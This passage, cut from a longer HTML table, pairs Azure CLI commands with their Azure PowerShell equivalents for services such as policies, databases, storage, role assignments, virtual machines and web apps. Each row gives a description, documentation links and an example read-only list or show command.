"\[?dnsSettings.internalDomainNameSuffix=`{dnsSuffix}`\]"</td><td>[Az.Network](https://docs.microsoft.com/en-us/powershell/module/az.network/?view=azps-4.4.0#networking)</td><td>Get-AzNetworkInterface</td></tr><tr><td>43</td><td>Manage resource policies.</td><td>[az policy](https://docs.microsoft.com/en-us/cli/azure/policy?view=azure-cli-latest)</td><td>az policy definition show --name MyPolicyDefinition</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#policies)</td><td>Get-AzPolicyDefinition</td></tr><tr><td>44</td><td>Manage Azure Database for PostgreSQL servers.</td><td>[az postgres](https://docs.microsoft.com/en-us/cli/azure/postgres?view=azure-cli-latest)</td><td>az postgres db list -g testgroup -s testsvr</td><td>[Az.PostgreSql](https://docs.microsoft.com/en-us/powershell/module/az.postgresql/?view=azps-4.4.0#database_for_postgresql)</td><td>Get-AzPostgreSqlServer</td></tr><tr><td>45</td><td>Manage dedicated Redis caches for your Azure applications.</td><td>[az redis](https://docs.microsoft.com/en-us/cli/azure/redis?view=azure-cli-latest)</td><td>az redis list \[--resource-group\] \[--subscription\]</td><td>[Az.RedisCache](https://docs.microsoft.com/en-us/powershell/module/az.rediscache/?view=azps-4.4.0#redis_cache)</td><td>Get-AzRedisCache -Name "myexists"</td></tr><tr><td>46</td><td>Manage Azure Reservations</td><td>[az reservations](https://docs.microsoft.com/en-us/cli/azure/reservations?view=azure-cli-latest)</td><td>az reservations reservation list --reservation-order-id \[--subscription\]</td><td>[Az.Reservations](https://docs.microsoft.com/en-us/powershell/module/az.reservations/?view=azps-4.4.0#reservations)</td><td>Get-AzReservation -ReservationOrderId "1111aaaa"</td></tr><tr><td>47</td><td>Manage Azure resources.</td><td>[az resource](https://docs.microsoft.com/en-us/cli/azure/resource?view=azure-cli-latest)</td><td>az resource list --location 
westus</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#resources)</td><td>Get-AzResource | ft</td></tr><tr><td>48</td><td>Manage user roles for access control with AAD and service principals</td><td>[az role](https://docs.microsoft.com/en-us/cli/azure/role?view=azure-cli-latest)</td><td>az role assignment list \[--all\]</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/get-azadserviceprincipal?view=azps-4.4.0)</td><td>Get-AzADServicePrincipal</td></tr><tr><td>49</td><td>Manage Azure Search services</td><td>[az search](https://docs.microsoft.com/en-us/cli/azure/search?view=azure-cli-latest)</td><td>az search service list --resource-group \[--subscription\]</td><td>[Az.Search](https://docs.microsoft.com/en-us/powershell/module/az.search/?view=azps-4.4.0#search)</td><td>Get-AzSearchService -ResourceGroupName felixwa-01</td></tr><tr><td>50</td><td>Manage security with Azure Security Center</td><td>[az security](https://docs.microsoft.com/en-us/cli/azure/security?view=azure-cli-latest)</td><td>az security alert list</td><td>[Az.Security](https://docs.microsoft.com/en-us/powershell/module/az.security/?view=azps-4.4.0#security)</td><td>Get-AzDiscoveredSecuritySolution</td></tr><tr><td>51</td><td>Manage shared image gallery</td><td>[az sig](https://docs.microsoft.com/en-us/cli/azure/sig?view=azure-cli-latest)</td><td>az sig list \[--resource-group\] \[--subscription\]</td><td>[Az.ImageBuilder](https://docs.microsoft.com/en-us/powershell/module/az.imagebuilder/?view=azps-4.4.0#vm_images)</td><td>Get-AzImageBuilderTemplate</td></tr><tr><td>52</td><td>Manage snapshots</td><td>[az snapshot](https://docs.microsoft.com/en-us/cli/azure/snapshot?view=azure-cli-latest)</td><td>az snapshot list \[--resource-group\] 
\[--subscription\]</td><td>[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/Get-AzSnapshot?view=azps-4.4.0)</td><td>Get-AzSnapshot</td></tr><tr><td>53</td><td>Manage Azure SQL Databases and Data Warehouses.</td><td>[az sql](https://docs.microsoft.com/en-us/cli/azure/sql)</td><td>az sql db list --resource-group myRG --server myserver</td><td>[Az.Sql](https://docs.microsoft.com/en-us/powershell/module/az.sql/get-azsqldatabase)</td><td>Get-AzSqlDatabase -ResourceGroupName "myRG" -ServerName "server01"</td></tr><tr><td>54</td><td>Manage Azure Storage resources</td><td>[az storage](https://docs.microsoft.com/en-us/cli/azure/storage)</td><td>az storage account list -g myRG</td><td>[Az.Storage](https://docs.microsoft.com/en-us/powershell/module/az.storage/?view=azps-4.4.0#storage)</td><td>Get-AzStorageAccount -ResourceGroupName "RG01"</td></tr><tr><td>55</td><td>Manage resource tags</td><td>[az tag](https://docs.microsoft.com/en-us/cli/azure/tag)</td><td>az tag list \[--subscription\]</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.accounts/Get-AzSubscription)</td><td>Get-AzTag -Name "Department"</td></tr><tr><td>56</td><td>Show the versions of Azure CLI modules</td><td>[az version](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-version)</td><td>az version \[--subscription\]</td><td>[PowerShellGet](https://docs.microsoft.com/en-us/powershell/module/powershellget/get-installedmodule?view=powershell-7)</td><td>Get-InstalledModule Azure -AllVersions</td></tr><tr><td>57</td><td>Manage Linux or Windows virtual machines</td><td>[az vm](https://docs.microsoft.com/en-us/cli/azure/vm)</td><td>az vm list -g myRG</td><td>[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#virtual_machines)</td><td>Get-AzVM -ResourceGroupName "myRG" -Name "VirtualMachine07"</td></tr><tr><td>58</td><td>Manage Virtual Machine Scale Set (VMSS)</td><td>[az 
vmss](https://docs.microsoft.com/en-us/cli/azure/vmss)</td><td>az vmss list --resource-group myRG</td><td>[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#vm_scale_sets)</td><td>Get-AzVmss -ResourceGroupName "Group001" -VMScaleSetName "VMSS001"</td></tr><tr><td>59</td><td>Manage web apps</td><td>[az webapp](https://docs.microsoft.com/en-us/cli/azure/webapp)</td><td>az webapp list --query "\[?state=='Running'\]"</td><td>[Az-WebApp](https://docs.microsoft.com/en-us/powershell/module/azurerm.websites/get-azurermwebapp?view=azurermps-6.13.0)</td><td>Get-AzWebApp -ResourceGroupName "Default-Web-WestUS" -Name "ContosoSite"</td></tr></tbody></table>